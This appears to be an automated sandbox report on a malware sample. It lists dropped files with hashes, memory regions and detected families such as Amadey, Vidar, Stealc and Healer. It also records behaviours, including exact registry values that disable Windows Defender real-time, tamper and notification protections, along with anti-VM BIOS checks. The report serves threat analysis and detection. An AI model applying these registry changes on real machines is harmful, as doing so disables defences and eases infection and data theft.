memory/2728-416-0x0000000000B70000-0x000000000102C000-memory.dmp

memory/344-417-0x00000000008C0000-0x0000000000BCA000-memory.dmp

memory/2384-419-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2684-423-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2728-426-0x0000000000B70000-0x000000000102C000-memory.dmp

memory/2384-432-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LW44N8OS\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

memory/2728-440-0x0000000000B70000-0x000000000102C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe

MD5 afc954940e0fc5ca6bdf390e0033a01c
SHA1 aa0193bc48197c86a7ce3401be6607f0e052a319
SHA256 07446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8
SHA512 b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148

memory/2384-453-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1124-454-0x0000000001280000-0x0000000001908000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe

MD5 08552f5efe19801cc3fafe356dccd710
SHA1 29d2bff1b2ecc298c1cb0a95d3af0de7ee239af9
SHA256 16e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7
SHA512 17457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d

memory/2728-479-0x0000000000B70000-0x000000000102C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\5baa7cac-9e65-4bcc-8c21-16ff4b485bf8

MD5 3ebf505728f14089505ae776d2617f90
SHA1 5219407902814412ba6b0114c41e530c3a99ffb2
SHA256 3d5e2a0e36a6d7d80c792f43e6f45f87d0a4aa4e916a80e6d1402d489e0b912a
SHA512 1a75c82ccef06516cb6009e409bd8dbfd27c43ae286b9fd8c56ece17ec892487bae100eab067ae3f2c848cfd13e8f91a855269d64e276fae62d298732cd062cb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\db\data.safe.bin

MD5 58828ad0b120d2dc2cf0e40337d66a9d
SHA1 681719ea2bf9fe4795fa4b0ce8cc8659a8d72a7d
SHA256 b9fe9bc8fac0b7585a2b3fa24c2926455fbde3c41916af7dc21825b450f65b0d
SHA512 a887db85dbb2e7b30e6084e1ff2dd8f58f0f40aebeddbedc84e8509455f04bd06119bc7f7a33b2b8ae4f0716a0d47d288f586b967be21913485496f3471e40e2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 bece0acf9d7f19d01c7943c54d2ad372
SHA1 aef59ca4b0fe97f32db128e103bfb98aee3b5e29
SHA256 ce40f79585195148ac86928d18da80b963cc98d6feb83c1c2e75e8b6d6ef39f8
SHA512 105fb01521fca054766d1d1e46cf3bf177b8bab44800f7bbad9a84f388af32e745474b3cc4f70c1fd779b4e7bcf0912502860092e1824f7ba4b52c612ba5a70b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\activity-stream.discovery_stream.json.tmp

MD5 c3cab17ab48f8809df218acc0ade40c7
SHA1 bea265716841ab083d20c437c03da3ff0eec00c5
SHA256 a3e54d843937797b2fbd26e15de8230cdbc56fa2e1b1d172a7a86851aed5cac9
SHA512 e4ed4177cfd9f3bf15ccab895fc4d9e81b0e283c77e2a30fc86c5184fd4d5a0ae903783a464ba0341bdce814aad5a3868167542337705fdbb78e8e4ae41ec262

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 4953a89ce8cbb66ee988c96c67d81715
SHA1 6515b00939e294f22782a5fbb6986964319025c8
SHA256 6405cf0055af4b501e8ed7cb3081377f7f0afb7a0bc698bbd333616012622beb
SHA512 8d1cc1efd81e3ada365ea87b847f3324d12332012569903b1173910047e0944647d76baad0cbd95d3eca9068b9d048629803313db721c94ca173533ce429e563

memory/2384-597-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe

MD5 37259000abc86b85dbb65366443ec3c1
SHA1 b6cf0ac13b56918992c9c6daa38e791a40f60f88
SHA256 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c
SHA512 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695

memory/3264-611-0x0000000000A90000-0x0000000000EDE000-memory.dmp

memory/3264-610-0x0000000000A90000-0x0000000000EDE000-memory.dmp

memory/2728-649-0x0000000000B70000-0x000000000102C000-memory.dmp

memory/2384-656-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5cd1beef6b9c8ce2a5ee1e02606dae4e
SHA1 0083140d4defd415e2d1e4dd5a0c3b549ce6c400
SHA256 9d6a090c3dc1c8eb05c27d703c3d54d39509984c68b8da72cd1bc5c6d2e9e3b4
SHA512 50f1104266ccaeba2b692f7200a5e48c36d1f7660b9c2e8c31c9ada46859a34c31d7106502a2ddaea684075f77c1cb7d21657127c040c6f3fdb79d37b482a04c

memory/2728-666-0x0000000000B70000-0x000000000102C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/2384-679-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 f2dc130a148910bf9103aa63524d23fe
SHA1 91245401f4245f796659165d8814c2557e09a6cc
SHA256 f8d57782a79728f287f8ef77f7042ed6f182f3ec5485298176acd8716aa1bcfb
SHA512 10abb5d662c902ff6d357d67a1f18ae531652e05d9eb73b762d1aa9eae3309e7eecb0649685bbbaa8224a506eed276e3e56d0800bee3bc80b53e9d57fb3278e4

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 9e9504c75fa9b52b78f45c4d6f889e41
SHA1 f1e4fbb8a4e9c55be920b336c8293ca9c69fc9d4
SHA256 6128b076e58a745aed2e2c3f22c6c2f48bb0bedbdd7d857d58d8ab38484a084d
SHA512 6c891da218a30cf0bbfb6977afb472ee879e5395eefdf80bd0372b732ba0db5f6f679c45d82dce1fb2f3ea24710420a6a207b174d54934fcab7b2dc6b88951d1

memory/2728-775-0x0000000000B70000-0x000000000102C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/3512-789-0x0000000000980000-0x00000000009E0000-memory.dmp

memory/2384-790-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3992-792-0x0000000000400000-0x0000000000429000-memory.dmp

C:\ProgramData\1D771913E5AD471F.dat

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/4932-848-0x0000000000230000-0x0000000000242000-memory.dmp

memory/4932-849-0x0000000000150000-0x0000000000160000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 02:01

Reported

2025-03-06 02:04

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
